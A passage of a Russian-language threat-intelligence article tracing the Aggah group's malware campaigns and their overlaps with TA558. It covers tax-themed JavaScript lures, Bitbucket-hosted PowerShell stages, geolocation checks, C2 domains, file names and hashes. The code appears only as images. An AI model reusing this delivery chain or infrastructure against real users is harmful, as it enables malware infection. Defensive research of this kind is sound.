<code>lnvoice 1882936796.js<\/code>, \u0447\u0435\u0439 \u043a\u043e\u0434 \u0438\u043c\u0435\u043b \u0441\u0445\u043e\u0436\u0438\u0435 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0438 \u0441 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u043c\u0438 \u0430\u0442\u0430\u043a\u0430\u043c\u0438. (\u041f\u043e\u043b\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u043d\u0430<a href=\"https:\/\/app.any.run\/tasks\/72a87633-a275-4c79-b51f-5bf0a42faad7\"> AnyRun<\/a>)<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/ed9\/f25\/a63\/ed9f25a631fea889bbc80a45a6324107.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 15. \u0410\u0442\u0430\u043a\u0430 Aggah \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Agent Tesla\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 15. \u0410\u0442\u0430\u043a\u0430 Aggah \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Agent Tesla\" width=\"901\" height=\"210\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/ed9\/f25\/a63\/ed9f25a631fea889bbc80a45a6324107.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/ed9\/f25\/a63\/ed9f25a631fea889bbc80a45a6324107.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 15. \u0410\u0442\u0430\u043a\u0430 Aggah \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Agent Tesla<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/852\/91d\/d22\/85291dd22f2497e49965c3d7764fda62.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 16.1. \u0427\u0430\u0441\u0442\u044c powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u0438\u0437 \u0430\u0442\u0430\u043a\u0438 (\u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044c 2023)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 16.1. \u0427\u0430\u0441\u0442\u044c powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u0438\u0437 \u0430\u0442\u0430\u043a\u0438 (\u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044c 2023)\" width=\"1202\" height=\"308\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/852\/91d\/d22\/85291dd22f2497e49965c3d7764fda62.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/852\/91d\/d22\/85291dd22f2497e49965c3d7764fda62.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 16.1. \u0427\u0430\u0441\u0442\u044c powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u0438\u0437 \u0430\u0442\u0430\u043a\u0438 (\u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044c 2023)<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/890\/9d2\/3ac\/8909d23acd7ce088e757860f22dcb6c4.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 16.2. \u0427\u0430\u0441\u0442\u044c powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u0438\u0437 \u0430\u0442\u0430\u043a\u0438 (\u0444\u0435\u0432\u0440\u0430\u043b\u044c 2023)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 16.2. \u0427\u0430\u0441\u0442\u044c powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u0438\u0437 \u0430\u0442\u0430\u043a\u0438 (\u0444\u0435\u0432\u0440\u0430\u043b\u044c 2023)\" width=\"1559\" height=\"294\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/890\/9d2\/3ac\/8909d23acd7ce088e757860f22dcb6c4.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/890\/9d2\/3ac\/8909d23acd7ce088e757860f22dcb6c4.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 16.2. \u0427\u0430\u0441\u0442\u044c powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u0438\u0437 \u0430\u0442\u0430\u043a\u0438 (\u0444\u0435\u0432\u0440\u0430\u043b\u044c 2023)<\/figcaption><\/div>\n<\/figure>\n<p>\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0430\u0442\u0430\u043a \u043f\u0440\u0438\u0432\u0435\u043b\u043e \u043d\u0430\u0441 \u043a \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438, \u043d\u0430\u0447\u0430\u0432\u0448\u0435\u0439\u0441\u044f \u0432 \u043a\u043e\u043d\u0446\u0435 2023 \u0433\u043e\u0434\u0430. \u0412 \u044d\u0442\u043e\u0442 \u043f\u0435\u0440\u0438\u043e\u0434 Aggah \u043d\u0430\u0447\u0430\u043b\u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u043d\u0430 \u0442\u0435\u043c\u0443 \u043d\u0430\u043b\u043e\u0433\u043e\u0432 \u0438\u043b\u0438 \u0441\u0447\u0435\u0442\u043e\u0432, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 XWorm \u0438\u043b\u0438 Agent Tesla. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 blogspot \u0438 bitbucket \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u043b\u043e\u0441\u044c, \u0430 \u043a\u043e\u0434 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u0438\u0437\u043c\u0435\u043d\u0438\u043b\u0441\u044f \u043d\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e.<\/p>\n<p>\u041f\u0440\u0438\u043c\u0435\u0440 \u0444\u0430\u0439\u043b\u0430 \u0438\u0437 \u044d\u0442\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438: <code>Robert_Michael_Tax_2023.js<\/code>. \u042d\u0442\u043e\u0442 \u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 javascript \u0444\u0430\u0439\u043b \u043e\u0431\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u043a \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0443 BitBucket <code>kimkardaikehsi<\/code> \u0438 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 Agent Tesla. \u041c\u043e\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c \u0441\u0445\u043e\u0436\u0435\u0441\u0442\u044c \u043a\u043e\u0434\u0430 \u0441 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u043c\u0438 \u043f\u0440\u0438\u043c\u0435\u0440\u0430\u043c\u0438.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/ce4\/828\/35f\/ce482835f4e7e0175e3f6857be3700d3.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 17. \u0427\u0430\u0441\u0442\u044c powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u0438\u0437 \u0430\u0442\u0430\u043a\u0438 (\u0438\u044e\u043d\u044c 2024)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 17. \u0427\u0430\u0441\u0442\u044c powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u0438\u0437 \u0430\u0442\u0430\u043a\u0438 (\u0438\u044e\u043d\u044c 2024)\" width=\"828\" height=\"189\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/ce4\/828\/35f\/ce482835f4e7e0175e3f6857be3700d3.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/ce4\/828\/35f\/ce482835f4e7e0175e3f6857be3700d3.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 17. \u0427\u0430\u0441\u0442\u044c powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u0438\u0437 \u0430\u0442\u0430\u043a\u0438 (\u0438\u044e\u043d\u044c 2024)<\/figcaption><\/div>\n<\/figure>\n<p>\u0410 \u0432 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u0430\u0445 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u043b\u043e\u0432\u043e\u0441\u043e\u0447\u0435\u0442\u0430\u043d\u0438\u044f \u201cCPA\u201d \u0438 \u201cmana\u201d:<\/p>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td>\n<p align=\"left\">manablack.duckdns[.]org<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">cpamay2024.duckdns[.]org<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">cpanewminemay24.duckdns[.]org<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u0412 2025 \u0433\u043e\u0434\u0443 \u0430\u0442\u0430\u043a\u0438 Aggah \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442\u0441\u044f, \u043d\u043e \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439 \u0442\u0435\u043f\u0435\u0440\u044c \u0441\u0442\u0430\u043b\u0438 Rhadamanthys \u0438 XWorm. \u0422\u0438\u043f\u0438\u0447\u043d\u0430\u044f \u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441 \u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e javascript \u0444\u0430\u0439\u043b\u0430 (\u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u0447\u0430\u0441\u0442\u043e \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 \u043d\u0430\u043b\u043e\u0433\u043e\u0432\u043e\u0439 \u0442\u0435\u043c\u0430\u0442\u0438\u043a\u043e\u0439 \u0438\u043b\u0438 \u0444\u043e\u0440\u043c\u0430\u043c\u0438 \u043e\u0442\u0447\u0435\u0442\u043d\u043e\u0441\u0442\u0438), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432 \u0438\u0442\u043e\u0433\u0435 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e PowerShell-\u043a\u043e\u0434\u0430:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cb5\/0fe\/84b\/cb50fe84bc04d58f75d59f56b7143abe.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a\u00a018. PowerShell-\u043a\u043e\u0434, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0438\u0439\u0441\u044f \u043f\u043e\u0441\u043b\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044f JavaScript-\u0444\u0430\u0439\u043b\u0430\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a\u00a018. PowerShell-\u043a\u043e\u0434, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0438\u0439\u0441\u044f \u043f\u043e\u0441\u043b\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044f JavaScript-\u0444\u0430\u0439\u043b\u0430\" width=\"841\" height=\"105\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/cb5\/0fe\/84b\/cb50fe84bc04d58f75d59f56b7143abe.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cb5\/0fe\/84b\/cb50fe84bc04d58f75d59f56b7143abe.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a\u00a018. PowerShell-\u043a\u043e\u0434, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0438\u0439\u0441\u044f \u043f\u043e\u0441\u043b\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044f JavaScript-\u0444\u0430\u0439\u043b\u0430<\/figcaption><\/div>\n<\/figure>\n<p>\u041f\u0440\u0438 \u043e\u0431\u0440\u0430\u0449\u0435\u043d\u0438\u0438 \u043a Blogspot \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0440\u0435\u0434\u0438\u0440\u0435\u043a\u0442 \u043d\u0430 bitbucket, \u043e\u0442\u043a\u0443\u0434\u0430 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f \u0444\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 powershell-\u0441\u043a\u0440\u0438\u043f\u0442, \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u044e\u0449\u0438\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432\u044b. \u0421\u0442\u043e\u0438\u0442 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u043f\u0435\u0440\u0435\u0434 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0433\u0435\u043e\u043b\u043e\u043a\u0430\u0446\u0438\u0438, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u043c \u043f\u043e\u0434\u0431\u0438\u0440\u0430\u0442\u044c \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u0432 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u0440\u0435\u0433\u0438\u043e\u043d\u0430. \u041f\u0440\u0438\u043c\u0435\u0440\u044b \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0439 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c<a href=\"https:\/\/app.any.run\/tasks\/46306d5d-5bac-4649-9d22-981ddd1c44d1\"> XWorm<\/a> \u0438<a href=\"https:\/\/app.any.run\/tasks\/792d5f75-6728-4fb3-96da-60e1d491c7a1\"> Rhadamanthys<\/a> \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0432 \u043e\u0442\u0447\u0435\u0442\u0430\u0445 AnyRun.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/1a3\/bce\/bbb\/1a3bcebbb6d56f926f2dbe201e0708bb.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 19. \u041f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0433\u0435\u043e\u043b\u043e\u043a\u0430\u0446\u0438\u0438\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 19. \u041f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0433\u0435\u043e\u043b\u043e\u043a\u0430\u0446\u0438\u0438\" width=\"1042\" height=\"1087\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/1a3\/bce\/bbb\/1a3bcebbb6d56f926f2dbe201e0708bb.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/1a3\/bce\/bbb\/1a3bcebbb6d56f926f2dbe201e0708bb.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 19. \u041f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0433\u0435\u043e\u043b\u043e\u043a\u0430\u0446\u0438\u0438<\/figcaption><\/div>\n<\/figure>\n<p><a class=\"anchor\" name=\"6.2.1.\" id=\"6.2.1.\"><\/a><\/p>\n<h4>6.2.1. \u041e\u0447\u0435\u0440\u0435\u0434\u043d\u044b\u0435 \u043f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u044f Aggah \u0441 TA558<\/h4>\n<p>\u00a0\u0412 2024 \u0433\u043e\u0434\u0443 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c IdaNotPro \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u0440\u0430\u0437\u0431\u043e\u0440 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0444\u0430\u0439\u043b\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 TA558, \u043f\u043e\u0434 \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043a\u043e\u043c<a href=\"https:\/\/somedieyoungzz.github.io\/posts\/ta558\/\"> \u00abTA558 Targeting Brazil\u00bb<\/a>. \u0412 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0432\u043d\u043e\u0432\u044c \u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u044b, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0433\u043e\u0441\u0442\u0438\u043d\u0438\u0447\u043d\u044b\u043c \u0431\u0438\u0437\u043d\u0435\u0441\u043e\u043c, \u0430 \u0442\u0430\u043a\u0436\u0435 C2-\u0434\u043e\u043c\u0435\u043d\u044b \u0441 cdt \u2014 \u044d\u043b\u0435\u043c\u0435\u043d\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u043a\u0430\u043a TA558, \u0442\u0430\u043a \u0438 Aggah.<\/p>\n<p>\u041f\u0440\u0438 \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u0438 \u0440\u0430\u0437\u0431\u0438\u0440\u0430\u0435\u043c\u043e\u0433\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0444\u0430\u0439\u043b\u0430 \u0441 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 Aggah, \u043c\u044b \u043d\u0430\u0448\u043b\u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0441\u043e\u0432\u043f\u0430\u0434\u0435\u043d\u0438\u044f. \u0412\u043e\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0441\u0445\u043e\u0434\u0441\u0442\u0432:<\/p>\n<ul>\n<li>\n<p>\u0421\u0442\u0430\u0434\u0438\u044f \u0441 powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u043c, \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u043c\u044b\u043c \u0441 <a href=\"http:\/\/detail-booking.com\">detail-booking.com<\/a>[.]br \u043f\u043e\u0445\u043e\u0436\u0430 \u043d\u0430 \u0442\u0430\u043a\u043e\u0432\u0443\u044e \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 Aggah. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 kimkarden \u0443 \u0422\u0410558, \u0430 \u0441\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u044b Aggah \u2013 BitBucket kimkardaikeshi. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0435\u0441\u043b\u0438 \u0441\u0440\u0430\u0432\u043d\u0438\u0442\u044c \u043a\u043e\u0434, \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0435 \u0441\u0445\u043e\u0436\u0435\u0441\u0442\u0438:<\/p>\n<\/li>\n<\/ul>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/0ec\/42f\/745\/0ec42f745203f5875646837e43a67ae2.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 20. \u0421\u043b\u0435\u0432\u0430 \u043a\u043e\u0434 Aggah (MD5: 11117203c6f2c96f6b78fd19bc27e49c), \u0441\u043f\u0440\u0430\u0432\u0430 \u043a\u043e\u0434 TA558 (MD5: c90688783f910b2b4165e2263012e19b)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 20. \u0421\u043b\u0435\u0432\u0430 \u043a\u043e\u0434 Aggah (MD5: 11117203c6f2c96f6b78fd19bc27e49c), \u0441\u043f\u0440\u0430\u0432\u0430 \u043a\u043e\u0434 TA558 (MD5: c90688783f910b2b4165e2263012e19b)\" width=\"1473\" height=\"1183\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/0ec\/42f\/745\/0ec42f745203f5875646837e43a67ae2.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/0ec\/42f\/745\/0ec42f745203f5875646837e43a67ae2.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 20. \u0421\u043b\u0435\u0432\u0430 \u043a\u043e\u0434 Aggah (MD5: 11117203c6f2c96f6b78fd19bc27e49c), \u0441\u043f\u0440\u0430\u0432\u0430 \u043a\u043e\u0434 TA558 (MD5: c90688783f910b2b4165e2263012e19b)<\/figcaption><\/div>\n<\/figure>\n<ul>\n<li>\n<p>\u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0444\u0430\u0439\u043b\u044b, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0434\u043e\u043c\u0435\u043d\u043e\u043c <a href=\"http:\/\/detail-booking.com\">detail-booking.com<\/a>[.]br, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u043c\u0441\u044f \u0422\u0410558, \u0438\u043c\u0435\u043b\u0438 \u043f\u043e\u0445\u043e\u0436\u0438\u0435 \u043d\u0430 Aggah \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f:<\/p>\n<\/li>\n<\/ul>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d51\/422\/678\/d5142267888b5913f08dfa6eb0e0a4ec.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 21. \u0421\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0434\u043e\u043c\u0435\u043d\u043e\u043c detail-booking.com[.]br \u0444\u0430\u0439\u043b\u044b\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 21. \u0421\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0434\u043e\u043c\u0435\u043d\u043e\u043c detail-booking.com[.]br \u0444\u0430\u0439\u043b\u044b\" width=\"1131\" height=\"894\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/d51\/422\/678\/d5142267888b5913f08dfa6eb0e0a4ec.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d51\/422\/678\/d5142267888b5913f08dfa6eb0e0a4ec.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 21. \u0421\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0434\u043e\u043c\u0435\u043d\u043e\u043c <a href=\"http:\/\/detail-booking.com\">detail-booking.com<\/a>[.]br \u0444\u0430\u0439\u043b\u044b<\/figcaption><\/div>\n<\/figure>\n<ul>\n<li>\n<p>\u0412 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0444\u0430\u0439\u043b\u043e\u0432, \u043e\u0431\u0449\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0441 \u0438\u0442\u043e\u0433\u043e\u0432\u044b\u043c C2 \u0434\u043e\u043c\u0435\u043d\u043e\u043c cdt2023.ddns.net \u0438\u0437 \u0430\u0442\u0430\u043a\u0438 TA558, \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0441\u0442\u0440\u043e\u043a\u0438, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u0442\u0435\u043a\u0441\u0442 \u00abCPA\u00bb, \u0447\u0442\u043e \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u043e\u0442\u043b\u0438\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u0438\u0441\u0442\u0438\u043a \u0430\u0442\u0430\u043a Aggah.<\/p>\n<\/li>\n<\/ul>\n<figure class=\"\"><img decoding=\"async\" 